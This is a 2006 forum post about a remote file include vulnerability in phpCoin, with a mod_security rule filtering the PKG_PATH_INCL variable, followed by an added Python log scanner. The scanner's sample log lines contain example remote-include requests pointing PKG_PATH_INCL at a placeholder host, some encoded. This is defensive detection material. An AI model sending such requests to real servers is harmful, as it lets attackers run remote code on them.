
SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

  1. cmeisinger

    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see:

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your mod_security configuration.

    SecFilter "PKG_PATH_INCL"

    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting

    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file; now I'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006
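
Added example, not part of the original post: a Python script that scans Apache access-log lines for requests passing PKG_PATH_INCL in the URL and separates those the rule answered with 403 from those that were served. The log format (Apache common/combined), the constructed sample lines, and the names find_hits and needs_review are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

PARAM = "pkg_path_incl"  # variable name from the post's SecFilter rule, lowercased
# Assumed format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def find_hits(lines):
    """Return one record per logged request that passes PKG_PATH_INCL in the URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes names and values, so an encoded name still matches.
        values = [v for k, v in parse_qsl(query, keep_blank_values=True)
                  if PARAM in k.lower()]
        if not values:
            continue
        hits.append({
            "host": m["host"], "time": m["time"], "path": path,
            "remote": any(REMOTE_RE.match(v) for v in values),  # value names another server
            "blocked": m["status"] == "403",                    # request was answered with 403
        })
    return hits

def needs_review(hits):
    """Requests that named a remote file and were not stopped with a 403."""
    return [h for h in hits if h["remote"] and not h["blocked"]]

# Constructed sample lines: documentation IP ranges, placeholder script name.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Aug/2006:10:01:02 -0500] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Aug/2006:10:03:44 -0500] "GET /coin_includes/placeholder.php'
    '?PKG_PATH_INCL=http://files.example.net/a.txt HTTP/1.1" 200 812',
    '198.51.100.7 - - [26/Aug/2006:11:15:09 -0500] "GET /coin_includes/placeholder.php'
    '?PKG%5FPATH%5FINCL=http%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 403 291',
    '203.0.113.5 - - [26/Aug/2006:11:20:30 -0500] "GET /coin_includes/placeholder.php'
    '?pkg_path_incl=/home/user/lib HTTP/1.1" 403 291',
]

if __name__ == "__main__":
    for h in needs_review(find_hits(SAMPLE_LOG)):
        print(f'{h["time"]}  {h["host"]}  {h["path"]}')
```

Run over logs that predate the rule, the needs_review output lists the requests that were served rather than refused, which are the ones worth checking against the affected account.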
